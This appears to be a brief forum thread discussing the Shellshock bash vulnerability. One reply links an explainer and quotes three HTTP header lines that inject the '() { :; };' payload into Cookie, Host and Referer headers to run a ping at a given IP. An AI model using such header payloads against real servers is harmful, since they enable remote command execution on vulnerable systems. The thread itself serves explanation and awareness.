1. 13
  1.  

  2. 1

    It’s valuable to see even a simple example of how this bug works. I’m still trying to convince some people as to the severity of this bug. Concreteness helps.

    1. 1

      I don’t think it gets much more concrete than this: http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html

      http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
      http-header = Host:() { :; }; ping -c 3 209.126.230.74
      http-header = Referer:() { :; }; ping -c 3 209.126.230.74